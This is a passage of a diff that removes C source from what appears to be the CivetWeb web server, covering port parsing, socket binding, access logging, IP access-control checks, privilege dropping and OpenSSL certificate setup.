- */
-static int
-parse_port_string(const struct vec *vec, struct socket *so, int *ip_version)
-{
-	unsigned int a, b, c, d, port;
-	int ch, len;
-	const char *cb;
-#if defined(USE_IPV6)
-	char buf[100] = {0};
-#endif
-
-	/* MacOS needs that. If we do not zero it, subsequent bind() will fail.
-	 * Also, all-zeroes in the socket address means binding to all addresses
-	 * for both IPv4 and IPv6 (INADDR_ANY and IN6ADDR_ANY_INIT). */
-	memset(so, 0, sizeof(*so));
-	so->lsa.sin.sin_family = AF_INET;
-	*ip_version = 0;
-
-	/* Initialize port and len as invalid. */
-	port = 0;
-	len = 0;
-
-	/* Test for different ways to format this string */
-	if (sscanf(vec->ptr, "%u.%u.%u.%u:%u%n", &a, &b, &c, &d, &port, &len)
-	    == 5) {
-		/* Bind to a specific IPv4 address, e.g. 192.168.1.5:8080 */
-		so->lsa.sin.sin_addr.s_addr =
-		    htonl((a << 24) | (b << 16) | (c << 8) | d);
-		so->lsa.sin.sin_port = htons((uint16_t)port);
-		*ip_version = 4;
-
-#if defined(USE_IPV6)
-	} else if (sscanf(vec->ptr, "[%49[^]]]:%u%n", buf, &port, &len) == 2
-	           && mg_inet_pton(
-	                  AF_INET6, buf, &so->lsa.sin6, sizeof(so->lsa.sin6))) {
-		/* IPv6 address, examples: see above */
-		/* so->lsa.sin6.sin6_family = AF_INET6; already set by mg_inet_pton
-		 */
-		so->lsa.sin6.sin6_port = htons((uint16_t)port);
-		*ip_version = 6;
-#endif
-
-	} else if ((vec->ptr[0] == '+')
-	           && (sscanf(vec->ptr + 1, "%u%n", &port, &len) == 1)) {
-
-		/* Port is specified with a +, bind to IPv6 and IPv4, INADDR_ANY */
-		/* Add 1 to len for the + character we skipped before */
-		len++;
-
-#if defined(USE_IPV6)
-		/* Set socket family to IPv6, do not use IPV6_V6ONLY */
-		so->lsa.sin6.sin6_family = AF_INET6;
-		so->lsa.sin6.sin6_port = htons((uint16_t)port);
-		*ip_version = 4 + 6;
-#else
-		/* Bind to IPv4 only, since IPv6 is not built in. */
-		so->lsa.sin.sin_port = htons((uint16_t)port);
-		*ip_version = 4;
-#endif
-
-	} else if (sscanf(vec->ptr, "%u%n", &port, &len) == 1) {
-		/* If only port is specified, bind to IPv4, INADDR_ANY */
-		so->lsa.sin.sin_port = htons((uint16_t)port);
-		*ip_version = 4;
-
-	} else if ((cb = strchr(vec->ptr, ':')) != NULL) {
-		/* Could be a hostname */
-		/* Will only work for RFC 952 compliant hostnames,
-		 * starting with a letter, containing only letters,
-		 * digits and hyphen ('-'). Newer specs may allow
-		 * more, but this is not guaranteed here, since it
-		 * may interfere with rules for port option lists. */
-
-		*(char *)cb = 0; /* Use a const cast here and modify the string.
-		                  * We are going to restore the string later. */
-
-		if (mg_inet_pton(
-		        AF_INET, vec->ptr, &so->lsa.sin, sizeof(so->lsa.sin))) {
-			if (sscanf(cb + 1, "%u%n", &port, &len) == 1) {
-				*ip_version = 4;
-				so->lsa.sin.sin_family = AF_INET;
-				so->lsa.sin.sin_port = htons((uint16_t)port);
-				len += (int)(cb - vec->ptr) + 1;
-			} else {
-				port = 0;
-				len = 0;
-			}
-#if defined(USE_IPV6)
-		} else if (mg_inet_pton(AF_INET6,
-		                        vec->ptr,
-		                        &so->lsa.sin6,
-		                        sizeof(so->lsa.sin6))) {
-			if (sscanf(cb + 1, "%u%n", &port, &len) == 1) {
-				*ip_version = 6;
-				so->lsa.sin6.sin6_family = AF_INET6;
-				so->lsa.sin.sin_port = htons((uint16_t)port);
-				len += (int)(cb - vec->ptr) + 1;
-			} else {
-				port = 0;
-				len = 0;
-			}
-#endif
-		}
-
-		*(char *)cb = ':'; /* restore the string */
-
-	} else {
-		/* Parsing failure. */
-	}
-
-	/* sscanf and the option splitting code ensure the following condition
-	 */
-	if ((len < 0) && ((unsigned)len > (unsigned)vec->len)) {
-		*ip_version = 0;
-		return 0;
-	}
-	ch = vec->ptr[len]; /* Next character after the port number */
-	so->is_ssl = (ch == 's');
-	so->ssl_redir = (ch == 'r');
-
-	/* Make sure the port is valid and vector ends with 's', 'r' or ',' */
-	if (is_valid_port(port)
-	    && ((ch == '\0') || (ch == 's') || (ch == 'r') || (ch == ','))) {
-		return 1;
-	}
-
-	/* Reset ip_version to 0 of there is an error */
-	*ip_version = 0;
-	return 0;
-}
-
-
-static int
-set_ports_option(struct mg_context *ctx)
-{
-	const char *list;
-	int on = 1;
-#if defined(USE_IPV6)
-	int off = 0;
-#endif
-	struct vec vec;
-	struct socket so, *ptr;
-
-	struct pollfd *pfd;
-	union usa usa;
-	socklen_t len;
-	int ip_version;
-
-	int portsTotal = 0;
-	int portsOk = 0;
-
-	if (!ctx) {
-		return 0;
-	}
-
-	memset(&so, 0, sizeof(so));
-	memset(&usa, 0, sizeof(usa));
-	len = sizeof(usa);
-	list = ctx->config[LISTENING_PORTS];
-
-	while ((list = next_option(list, &vec, NULL)) != NULL) {
-
-		portsTotal++;
-
-		if (!parse_port_string(&vec, &so, &ip_version)) {
-			mg_cry(fc(ctx),
-			       "%.*s: invalid port spec (entry %i). Expecting list of: %s",
-			       (int)vec.len,
-			       vec.ptr,
-			       portsTotal,
-			       "[IP_ADDRESS:]PORT[s|r]");
-			continue;
-		}
-
-#if !defined(NO_SSL)
-		if (so.is_ssl && ctx->ssl_ctx == NULL) {
-
-			mg_cry(fc(ctx),
-			       "Cannot add SSL socket (entry %i). Is -ssl_certificate "
-			       "option set?",
-			       portsTotal);
-			continue;
-		}
-#endif
-
-		if ((so.sock = socket(so.lsa.sa.sa_family, SOCK_STREAM, 6))
-		    == INVALID_SOCKET) {
-
-			mg_cry(fc(ctx), "cannot create socket (entry %i)", portsTotal);
-			continue;
-		}
-
-#ifdef _WIN32
-		/* Windows SO_REUSEADDR lets many procs binds to a
-		 * socket, SO_EXCLUSIVEADDRUSE makes the bind fail
-		 * if someone already has the socket -- DTL */
-		/* NOTE: If SO_EXCLUSIVEADDRUSE is used,
-		 * Windows might need a few seconds before
-		 * the same port can be used again in the
-		 * same process, so a short Sleep may be
-		 * required between mg_stop and mg_start.
-		 */
-		if (setsockopt(so.sock,
-		               SOL_SOCKET,
-		               SO_EXCLUSIVEADDRUSE,
-		               (SOCK_OPT_TYPE)&on,
-		               sizeof(on)) != 0) {
-
-			/* Set reuse option, but don't abort on errors. */
-			mg_cry(fc(ctx),
-			       "cannot set socket option SO_EXCLUSIVEADDRUSE (entry %i)",
-			       portsTotal);
-		}
-#else
-		if (setsockopt(so.sock,
-		               SOL_SOCKET,
-		               SO_REUSEADDR,
-		               (SOCK_OPT_TYPE)&on,
-		               sizeof(on)) != 0) {
-
-			/* Set reuse option, but don't abort on errors. */
-			mg_cry(fc(ctx),
-			       "cannot set socket option SO_REUSEADDR (entry %i)",
-			       portsTotal);
-		}
-#endif
-
-		if (ip_version > 4) {
-#if defined(USE_IPV6)
-			if (ip_version == 6) {
-				if (so.lsa.sa.sa_family == AF_INET6
-				    && setsockopt(so.sock,
-				                  IPPROTO_IPV6,
-				                  IPV6_V6ONLY,
-				                  (void *)&off,
-				                  sizeof(off)) != 0) {
-
-					/* Set IPv6 only option, but don't abort on errors. */
-					mg_cry(fc(ctx),
-					       "cannot set socket option IPV6_V6ONLY (entry %i)",
-					       portsTotal);
-				}
-			}
-#else
-			mg_cry(fc(ctx), "IPv6 not available");
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-#endif
-		}
-
-		if (so.lsa.sa.sa_family == AF_INET) {
-
-			len = sizeof(so.lsa.sin);
-			if (bind(so.sock, &so.lsa.sa, len) != 0) {
-				mg_cry(fc(ctx),
-				       "cannot bind to %.*s: %d (%s)",
-				       (int)vec.len,
-				       vec.ptr,
-				       (int)ERRNO,
-				       strerror(errno));
-				closesocket(so.sock);
-				so.sock = INVALID_SOCKET;
-				continue;
-			}
-		}
-#if defined(USE_IPV6)
-		else if (so.lsa.sa.sa_family == AF_INET6) {
-
-			len = sizeof(so.lsa.sin6);
-			if (bind(so.sock, &so.lsa.sa, len) != 0) {
-				mg_cry(fc(ctx),
-				       "cannot bind to IPv6 %.*s: %d (%s)",
-				       (int)vec.len,
-				       vec.ptr,
-				       (int)ERRNO,
-				       strerror(errno));
-				closesocket(so.sock);
-				so.sock = INVALID_SOCKET;
-				continue;
-			}
-		}
-#endif
-		else {
-			mg_cry(fc(ctx),
-			       "cannot bind: address family not supported (entry %i)",
-			       portsTotal);
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-		}
-
-		if (listen(so.sock, SOMAXCONN) != 0) {
-
-			mg_cry(fc(ctx),
-			       "cannot listen to %.*s: %d (%s)",
-			       (int)vec.len,
-			       vec.ptr,
-			       (int)ERRNO,
-			       strerror(errno));
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-		}
-
-		if ((getsockname(so.sock, &(usa.sa), &len) != 0)
-		    || (usa.sa.sa_family != so.lsa.sa.sa_family)) {
-
-			int err = (int)ERRNO;
-			mg_cry(fc(ctx),
-			       "call to getsockname failed %.*s: %d (%s)",
-			       (int)vec.len,
-			       vec.ptr,
-			       err,
-			       strerror(errno));
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-		}
-
-/* Update lsa port in case of random free ports */
-#if defined(USE_IPV6)
-		if (so.lsa.sa.sa_family == AF_INET6) {
-			so.lsa.sin6.sin6_port = usa.sin6.sin6_port;
-		} else
-#endif
-		{
-			so.lsa.sin.sin_port = usa.sin.sin_port;
-		}
-
-		if ((ptr = (struct socket *)
-		         mg_realloc_ctx(ctx->listening_sockets,
-		                        (ctx->num_listening_sockets + 1)
-		                            * sizeof(ctx->listening_sockets[0]),
-		                        ctx)) == NULL) {
-
-			mg_cry(fc(ctx), "%s", "Out of memory");
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-		}
-
-		if ((pfd = (struct pollfd *)
-		         mg_realloc_ctx(ctx->listening_socket_fds,
-		                        (ctx->num_listening_sockets + 1)
-		                            * sizeof(ctx->listening_socket_fds[0]),
-		                        ctx)) == NULL) {
-
-			mg_cry(fc(ctx), "%s", "Out of memory");
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			mg_free(ptr);
-			continue;
-		}
-
-		set_close_on_exec(so.sock, fc(ctx));
-		ctx->listening_sockets = ptr;
-		ctx->listening_sockets[ctx->num_listening_sockets] = so;
-		ctx->listening_socket_fds = pfd;
-		ctx->num_listening_sockets++;
-		portsOk++;
-	}
-
-	if (portsOk != portsTotal) {
-		close_all_listening_sockets(ctx);
-		portsOk = 0;
-	}
-
-	return portsOk;
-}
-
-
-static const char *
-header_val(const struct mg_connection *conn, const char *header)
-{
-	const char *header_value;
-
-	if ((header_value = mg_get_header(conn, header)) == NULL) {
-		return "-";
-	} else {
-		return header_value;
-	}
-}
-
-
-static void
-log_access(const struct mg_connection *conn)
-{
-	const struct mg_request_info *ri;
-	struct mg_file fi;
-	char date[64], src_addr[IP_ADDR_STR_LEN];
-	struct tm *tm;
-
-	const char *referer;
-	const char *user_agent;
-
-	char buf[4096];
-
-	if (!conn || !conn->ctx) {
-		return;
-	}
-
-	if (conn->ctx->config[ACCESS_LOG_FILE] != NULL) {
-		if (mg_fopen(conn,
-		             conn->ctx->config[ACCESS_LOG_FILE],
-		             MG_FOPEN_MODE_APPEND,
-		             &fi) == 0) {
-			fi.access.fp = NULL;
-		}
-	} else {
-		fi.access.fp = NULL;
-	}
-
-	/* Log is written to a file and/or a callback. If both are not set,
-	 * executing the rest of the function is pointless. */
-	if ((fi.access.fp == NULL) && (conn->ctx->callbacks.log_access == NULL)) {
-		return;
-	}
-
-	tm = localtime(&conn->conn_birth_time);
-	if (tm != NULL) {
-		strftime(date, sizeof(date), "%d/%b/%Y:%H:%M:%S %z", tm);
-	} else {
-		mg_strlcpy(date, "01/Jan/1970:00:00:00 +0000", sizeof(date));
-		date[sizeof(date) - 1] = '\0';
-	}
-
-	ri = &conn->request_info;
-
-	sockaddr_to_string(src_addr, sizeof(src_addr), &conn->client.rsa);
-	referer = header_val(conn, "Referer");
-	user_agent = header_val(conn, "User-Agent");
-
-	mg_snprintf(conn,
-	            NULL, /* Ignore truncation in access log */
-	            buf,
-	            sizeof(buf),
-	            "%s - %s [%s] \"%s %s%s%s HTTP/%s\" %d %" INT64_FMT " %s %s",
-	            src_addr,
-	            (ri->remote_user == NULL) ? "-" : ri->remote_user,
-	            date,
-	            ri->request_method ? ri->request_method : "-",
-	            ri->request_uri ? ri->request_uri : "-",
-	            ri->query_string ? "?" : "",
-	            ri->query_string ? ri->query_string : "",
-	            ri->http_version,
-	            conn->status_code,
-	            conn->num_bytes_sent,
-	            referer,
-	            user_agent);
-
-	if (conn->ctx->callbacks.log_access) {
-		conn->ctx->callbacks.log_access(conn, buf);
-	}
-
-	if (fi.access.fp) {
-		int ok = 1;
-		flockfile(fi.access.fp);
-		if (fprintf(fi.access.fp, "%s\n", buf) < 1) {
-			ok = 0;
-		}
-		if (fflush(fi.access.fp) != 0) {
-			ok = 0;
-		}
-		funlockfile(fi.access.fp);
-		if (mg_fclose(&fi.access) != 0) {
-			ok = 0;
-		}
-		if (!ok) {
-			mg_cry(conn,
-			       "Error writing log file %s",
-			       conn->ctx->config[ACCESS_LOG_FILE]);
-		}
-	}
-}
-
-
-/* Verify given socket address against the ACL.
- * Return -1 if ACL is malformed, 0 if address is disallowed, 1 if allowed.
- */
-static int
-check_acl(struct mg_context *ctx, uint32_t remote_ip)
-{
-	int allowed, flag;
-	uint32_t net, mask;
-	struct vec vec;
-
-	if (ctx) {
-		const char *list = ctx->config[ACCESS_CONTROL_LIST];
-
-		/* If any ACL is set, deny by default */
-		allowed = (list == NULL) ? '+' : '-';
-
-		while ((list = next_option(list, &vec, NULL)) != NULL) {
-			flag = vec.ptr[0];
-			if ((flag != '+' && flag != '-')
-			    || (parse_net(&vec.ptr[1], &net, &mask) == 0)) {
-				mg_cry(fc(ctx),
-				       "%s: subnet must be [+|-]x.x.x.x[/x]",
-				       __func__);
-				return -1;
-			}
-
-			if (net == (remote_ip & mask)) {
-				allowed = flag;
-			}
-		}
-
-		return allowed == '+';
-	}
-	return -1;
-}
-
-
-#if !defined(_WIN32)
-static int
-set_uid_option(struct mg_context *ctx)
-{
-	struct passwd *pw;
-	if (ctx) {
-		const char *uid = ctx->config[RUN_AS_USER];
-		int success = 0;
-
-		if (uid == NULL) {
-			success = 1;
-		} else {
-			if ((pw = getpwnam(uid)) == NULL) {
-				mg_cry(fc(ctx), "%s: unknown user [%s]", __func__, uid);
-			} else if (setgid(pw->pw_gid) == -1) {
-				mg_cry(fc(ctx),
-				       "%s: setgid(%s): %s",
-				       __func__,
-				       uid,
-				       strerror(errno));
-			} else if (setgroups(0, NULL)) {
-				mg_cry(fc(ctx),
-				       "%s: setgroups(): %s",
-				       __func__,
-				       strerror(errno));
-			} else if (setuid(pw->pw_uid) == -1) {
-				mg_cry(fc(ctx),
-				       "%s: setuid(%s): %s",
-				       __func__,
-				       uid,
-				       strerror(errno));
-			} else {
-				success = 1;
-			}
-		}
-
-		return success;
-	}
-	return 0;
-}
-#endif /* !_WIN32 */
-
-
-static void
-tls_dtor(void *key)
-{
-	struct mg_workerTLS *tls = (struct mg_workerTLS *)key;
-	/* key == pthread_getspecific(sTlsKey); */
-
-	if (tls) {
-		if (tls->is_master == 2) {
-			tls->is_master = -3; /* Mark memory as dead */
-			mg_free(tls);
-		}
-	}
-	pthread_setspecific(sTlsKey, NULL);
-}
-
-
-#if !defined(NO_SSL)
-
-static int
-ssl_use_pem_file(struct mg_context *ctx, const char *pem, const char *chain);
-static const char *ssl_error(void);
-
-
-static int
-refresh_trust(struct mg_connection *conn)
-{
-	static int reload_lock = 0;
-	static long int data_check = 0;
-	volatile int *p_reload_lock = (volatile int *)&reload_lock;
-
-	struct stat cert_buf;
-	long int t;
-	const char *pem;
-	const char *chain;
-	int should_verify_peer;
-
-	if ((pem = conn->ctx->config[SSL_CERTIFICATE]) == NULL) {
-		/* If peem is NULL and conn->ctx->callbacks.init_ssl is not,
-		 * refresh_trust still can not work. */
-		return 0;
-	}
-	chain = conn->ctx->config[SSL_CERTIFICATE_CHAIN];
-	if (chain == NULL) {
-		/* pem is not NULL here */
-		chain = pem;
-	}
-	if (*chain == 0) {
-		chain = NULL;
-	}
-
-	t = data_check;
-	if (stat(pem, &cert_buf) != -1) {
-		t = (long int)cert_buf.st_mtime;
-	}
-
-	if (data_check != t) {
-		data_check = t;
-
-		should_verify_peer = 0;
-		if (conn->ctx->config[SSL_DO_VERIFY_PEER] != NULL) {
-			if (mg_strcasecmp(conn->ctx->config[SSL_DO_VERIFY_PEER], "yes")
-			    == 0) {
-				should_verify_peer = 1;
-			} else if (mg_strcasecmp(conn->ctx->config[SSL_DO_VERIFY_PEER],
-			                         "optional") == 0) {
-				should_verify_peer = 1;
-			}
-		}
-
-		if (should_verify_peer) {
-			char *ca_path = conn->ctx->config[SSL_CA_PATH];
-			char *ca_file = conn->ctx->config[SSL_CA_FILE];
-			if (SSL_CTX_load_verify_locations(conn->ctx->ssl_ctx,
-			                                  ca_file,
-			                                  ca_path) != 1) {
-				mg_cry(fc(conn->ctx),
-				       "SSL_CTX_load_verify_locations error: %s "
-				       "ssl_verify_peer requires setting "
-				       "either ssl_ca_path or ssl_ca_file. Is any of them "
-				       "present in "
-				       "the .conf file?",
-				       ssl_error());
-				return 0;
-			}
-		}
-
-		if (1 == mg_atomic_inc(p_reload_lock)) {
-			if (ssl_use_pem_file(conn->ctx, pem, chain) == 0) {
-				return 0;
-			}
-			*p_reload_lock = 0;
-		}
-	}
-	/* lock while cert is reloading */
-	while (*p_reload_lock) {
-		sleep(1);
-	}
-
-	return 1;
-}
-
-#ifdef OPENSSL_API_1_1
-#else
-static pthread_mutex_t *ssl_mutexes;
-#endif /* OPENSSL_API_1_1 */
-
-static int
-sslize(struct mg_connection *conn,
-       SSL_CTX *s,
-       int (*func)(SSL *),
-       volatile int *stop_server)
-{
-	int ret, err;
-	int short_trust;
-	unsigned i;
-
-	if (!conn) {
-		return 0;
-	}
-
-	short_trust =
-	    (conn->ctx->config[SSL_SHORT_TRUST] != NULL)
-	    && (mg_strcasecmp(conn->ctx->config[SSL_SHORT_TRUST], "yes") == 0);
-
-	if (short_trust) {
-		int trust_ret = refresh_trust(conn);
-		if (!trust_ret) {
-			return trust_ret;
-		}
-	}
-
-	conn->ssl = SSL_new(s);
-	if (conn->ssl == NULL) {
-		return 0;
-	}
-	SSL_set_app_data(conn->ssl, (char *)conn);
-
-	ret = SSL_set_fd(conn->ssl, conn->client.sock);
-	if (ret != 1) {
-		err = SSL_get_error(conn->ssl, ret);
-		(void)err; /* TODO: set some error message */
-		SSL_free(conn->ssl);
-		conn->ssl = NULL;
-/* Avoid CRYPTO_cleanup_all_ex_data(); See discussion:
- * https://wiki.openssl.org/index.php/Talk:Library_Initialization */
-#ifndef OPENSSL_API_1_1
-		ERR_remove_state(0);
-#endif
-		return 0;
-	}
-
-	/* SSL functions may fail and require to be called again:
-	 * see https://www.openssl.org/docs/manmaster/ssl/SSL_get_error.html
-	 * Here "func" could be SSL_connect or SSL_accept. */
-	for (i = 16; i <= 1024; i *= 2) {
-		ret = func(conn->ssl);
-		if (ret != 1) {
-			err = SSL_get_error(conn->ssl, ret);
-			if ((err == SSL_ERROR_WANT_CONNECT)
-			    || (err == SSL_ERROR_WANT_ACCEPT)
-			    || (err == SSL_ERROR_WANT_READ)
-			    || (err == SSL_ERROR_WANT_WRITE)) {
-				/* Need to retry the function call "later".
-				 * See https://linux.die.net/man/3/ssl_get_error
-				 * This is typical for non-blocking sockets. */
-				if (*stop_server) {
-					/* Don't wait if the server is going to be stopped. */
-					break;
-				}
-				mg_sleep(i);
-
-			} else if (err == SSL_ERROR_SYSCALL) {
-				/* This is an IO error. Look at errno. */
-				err = errno;
-				/* TODO: set some error message */
-				(void)err;
-				break;
-			} else {
-				/* This is an SSL specific error */
-				/* TODO: set some error message */
-				break;
-			}
-
-		} else {
-			/* success */
-			break;
-		}
-	}
-
-	if (ret != 1) {
-		SSL_free(conn->ssl);
-		conn->ssl = NULL;
-/* Avoid CRYPTO_cleanup_all_ex_data(); See discussion:
- * https://wiki.openssl.org/index.php/Talk:Library_Initialization */
-#ifndef OPENSSL_API_1_1
-		ERR_remove_state(0);
-#endif
-		return 0;
-	}
-
-	return 1;
-}
-
-
-/* Return OpenSSL error message (from CRYPTO lib) */
-static const char *
-ssl_error(void)
-{
-	unsigned long err;
-	err = ERR_get_error();
-	return ((err == 0) ? "" : ERR_error_string(err, NULL));
-}
-
-
-static int
-hexdump2string(void *mem, int memlen, char *buf, int buflen)
-{
-	int i;
-	const char hexdigit[] = "0123456789abcdef";
-
-	if ((memlen <= 0) || (buflen <= 0)) {
-		return 0;
-	}
-	if (buflen < (3 * memlen)) {
-		return 0;
-	}
-
-	for (i = 0; i < memlen; i++) {
-		if (i > 0) {
-			buf[3 * i - 1] = ' ';
-		}
-		buf[3 * i] = hexdigit[(((uint8_t *)mem)[i] >> 4) & 0xF];
-		buf[3 * i + 1] = hexdigit[((uint8_t *)mem)[i] & 0xF];
-	}
-	buf[3 * memlen - 1] = 0;
-
-	return 1;
-}
-
-
-static void
-ssl_get_client_cert_info(struct mg_connection *conn)
-{
-	X509 *cert = SSL_get_peer_certificate(conn->ssl);
-	if (cert) {
-		char str_subject[1024];
-		char str_issuer[1024];
-		char str_finger[1024];
-		unsigned char buf[256];
-		char *str_serial = NULL;
-		unsigned int ulen;
-		int ilen;
-		unsigned char *tmp_buf;
-		unsigned char *tmp_p;
-
-		/* Handle to algorithm used for fingerprint */
-		const EVP_MD *digest = EVP_get_digestbyname("sha1");
-
-		/* Get Subject and issuer */
-		X509_NAME *subj = X509_get_subject_name(cert);
-		X509_NAME *iss = X509_get_issuer_name(cert);
-
-		/* Get serial number */
-		ASN1_INTEGER *serial = X509_get_serialNumber(cert);
-
-		/* Translate serial number to a hex string */
-		BIGNUM *serial_bn = ASN1_INTEGER_to_BN(serial, NULL);
-		str_serial = BN_bn2hex(serial_bn);
-		BN_free(serial_bn);
-
-		/* Translate subject and issuer to a string */
-		(void)X509_NAME_oneline(subj, str_subject, (int)sizeof(str_subject));
-		(void)X509_NAME_oneline(iss, str_issuer, (int)sizeof(str_issuer));
-
-		/* Calculate SHA1 fingerprint and store as a hex string */
-		ulen = 0;
-
-		/* ASN1_digest is deprecated. Do the calculation manually,
-		 * using EVP_Digest. */
-		ilen = i2d_X509(cert, NULL);
-		tmp_buf =
-		    (ilen > 0)
-		        ? (unsigned char *)mg_malloc_ctx((unsigned)ilen + 1, conn->ctx)
-		        : NULL;
-		if (tmp_buf) {
-			tmp_p = tmp_buf;
-			(void)i2d_X509(cert, &tmp_p);
-			if (!EVP_Digest(
-			        tmp_buf, (unsigned)ilen, buf, &ulen, digest, NULL)) {
-				ulen = 0;
-			}
-			mg_free(tmp_buf);
-		}
-
-		if (!hexdump2string(
-		        buf, (int)ulen, str_finger, (int)sizeof(str_finger))) {
-			*str_finger = 0;
-		}
-
-		conn->request_info.client_cert = (struct mg_client_cert *)
-		    mg_malloc_ctx(sizeof(struct mg_client_cert), conn->ctx);
-		if (conn->request_info.client_cert) {
-			conn->request_info.client_cert->subject = mg_strdup(str_subject);
-			conn->request_info.client_cert->issuer = mg_strdup(str_issuer);
-			conn->request_info.client_cert->serial = mg_strdup(str_serial);
-			conn->request_info.client_cert->finger = mg_strdup(str_finger);
-		} else {
-			mg_cry(conn,
-			       "Out of memory: Cannot allocate memory for client "
-			       "certificate");
-		}
-
-		/* Strings returned from bn_bn2hex must be freed using OPENSSL_free,
-		 * see https://linux.die.net/man/3/bn_bn2hex */
-		OPENSSL_free(str_serial);
-
-		/* Free certificate memory */
-		X509_free(cert);
-	}
-}
-
-
-#ifdef OPENSSL_API_1_1
-#else
-static void
-ssl_locking_callback(int mode, int mutex_num, const char *file, int line)
-{
-	(void)line;
-	(void)file;
-
-	if (mode & 1) {
-		/* 1 is CRYPTO_LOCK */
-		(void)pthread_mutex_lock(&ssl_mutexes[mutex_num]);
-	} else {
-		(void)pthread_mutex_unlock(&ssl_mutexes[mutex_num]);
-	}
-}
-#endif /* OPENSSL_API_1_1 */
-
-
-#if !defined(NO_SSL_DL)
-static void *
-load_dll(char *ebuf, size_t ebuf_len, const char *dll_name, struct ssl_func *sw)
-{
-	union {
-		void *p;
-		void (*fp)(void);
-	} u;
-	void *dll_handle;
-	struct ssl_func *fp;
-	int ok;
-	int truncated = 0;
-
-	if ((dll_handle = dlopen(dll_name, RTLD_LAZY)) == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s: cannot load %s",
-		            __func__,
-		            dll_name);
-		return NULL;
-	}
-
-	ok = 1;
-	for (fp = sw; fp->name != NULL; fp++) {
-#ifdef _WIN32
-		/* GetProcAddress() returns pointer to function */
-		u.fp = (void (*)(void))dlsym(dll_handle, fp->name);
-#else
-		/* dlsym() on UNIX returns void *. ISO C forbids casts of data
-		 * pointers to function pointers. We need to use a union to make a
-		 * cast. */
-		u.p = dlsym(dll_handle, fp->name);
-#endif /* _WIN32 */
-		if (u.fp == NULL) {
-			if (ok) {
-				mg_snprintf(NULL,
-				            &truncated,
-				            ebuf,
-				            ebuf_len,
-				            "%s: %s: cannot find %s",
-				            __func__,
-				            dll_name,
-				            fp->name);
-				ok = 0;
-			} else {
-				size_t cur_len = strlen(ebuf);
-				if (!truncated) {
-					mg_snprintf(NULL,
-					            &truncated,
-					            ebuf + cur_len,
-					            ebuf_len - cur_len - 3,
-					            ", %s",
-					            fp->name);
-					if (truncated) {
-						/* If truncated, add "..." */
-						strcat(ebuf, "...");
-					}
-				}
-			}
-			/* Debug:
-			 * printf("Missing function: %s\n", fp->name); */
-		} else {
-			fp->ptr = u.fp;
-		}
-	}
-
-	if (!ok) {
-		(void)dlclose(dll_handle);
-		return NULL;
-	}
-
-	return dll_handle;
-}
-
-
-static void *ssllib_dll_handle;    /* Store the ssl library handle. */
-static void *cryptolib_dll_handle; /* Store the crypto library handle. */
-
-#endif /* NO_SSL_DL */
-
-
-#if defined(SSL_ALREADY_INITIALIZED)
-static int cryptolib_users = 1; /* Reference counter for crypto library. */
-#else
-static int cryptolib_users = 0; /* Reference counter for crypto library. */
-#endif
-
-
-static int
-initialize_ssl(char *ebuf, size_t ebuf_len)
-{
-#ifdef OPENSSL_API_1_1
-	if (ebuf_len > 0) {
-		ebuf[0] = 0;
-	}
-
-#if !defined(NO_SSL_DL)
-	if (!cryptolib_dll_handle) {
-		cryptolib_dll_handle = load_dll(ebuf, ebuf_len, CRYPTO_LIB, crypto_sw);
-		if (!cryptolib_dll_handle) {
-			return 0;
-		}
-	}
-#endif /* NO_SSL_DL */
-
-	if (mg_atomic_inc(&cryptolib_users) > 1) {
-		return 1;
-	}
-
-#else /* not OPENSSL_API_1_1 */
-	int i;
-	size_t size;
-
-	if (ebuf_len > 0) {
-		ebuf[0] = 0;
-	}
-
-#if !defined(NO_SSL_DL)
-	if (!cryptolib_dll_handle) {
-		cryptolib_dll_handle = load_dll(ebuf, ebuf_len, CRYPTO_LIB, crypto_sw);
-		if (!cryptolib_dll_handle) {
-			return 0;
-		}
-	}
-#endif /* NO_SSL_DL */
-
-	if (mg_atomic_inc(&cryptolib_users) > 1) {
-		return 1;
-	}
-
-	/* Initialize locking callbacks, needed for thread safety.
-	 * http://www.openssl.org/support/faq.html#PROG1
-	 */
-	i = CRYPTO_num_locks();
-	if (i < 0) {
-		i = 0;
-	}
-	size = sizeof(pthread_mutex_t) * ((size_t)(i));
-
-	if (size == 0) {
-		ssl_mutexes = NULL;
-	} else if ((ssl_mutexes = (pthread_mutex_t *)mg_malloc(size)) == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s: cannot allocate mutexes: %s",
-		            __func__,
-		            ssl_error());
-
-		return 0;
-	}
-
-	for (i = 0; i < CRYPTO_num_locks(); i++) {
-		pthread_mutex_init(&ssl_mutexes[i], &pthread_mutex_attr);
-	}
-
-	CRYPTO_set_locking_callback(&ssl_locking_callback);
-	CRYPTO_set_id_callback(&mg_current_thread_id);
-#endif /* OPENSSL_API_1_1 */
-
-	return 1;
-}
-
-
-static int
-ssl_use_pem_file(struct mg_context *ctx, const char *pem, const char *chain)
-{
-	if (SSL_CTX_use_certificate_file(ctx->ssl_ctx, pem, 1) == 0) {
-		mg_cry(fc(ctx),
-		       "%s: cannot open certificate file %s: %s",
-		       __func__,
-		       pem,
-		       ssl_error());
-		return 0;
-	}
-
-	/* could use SSL_CTX_set_default_passwd_cb_userdata */
-	if (SSL_CTX_use_PrivateKey_file(ctx->ssl_ctx, pem, 1) == 0) {
-		mg_cry(fc(ctx),
-		       "%s: cannot open private key file %s: %s",
-		       __func__,
-		       pem,
-		       ssl_error());
-		return 0;
-	}
-
-	if (SSL_CTX_check_private_key(ctx->ssl_ctx) == 0) {
-		mg_cry(fc(ctx),
-		       "%s: certificate and private key do not match: %s",
-		       __func__,
-		       pem);
-		return 0;
-	}
-
-	/* In contrast to OpenSSL, wolfSSL does not support certificate
-	 * chain files that contain private keys and certificates in
-	 * SSL_CTX_use_certificate_chain_file.
-	 * The CivetWeb-Server used pem-Files that contained both information.
-	 * In order to make wolfSSL work, it is split in two files.
-	 * One file that contains key and certificate used by the server and
-	 * an optional chain file for the ssl stack.
-	 */
-	if (chain) {
-		if (SSL_CTX_use_certificate_chain_file(ctx->ssl_ctx, chain) == 0) {
-			mg_cry(fc(ctx),
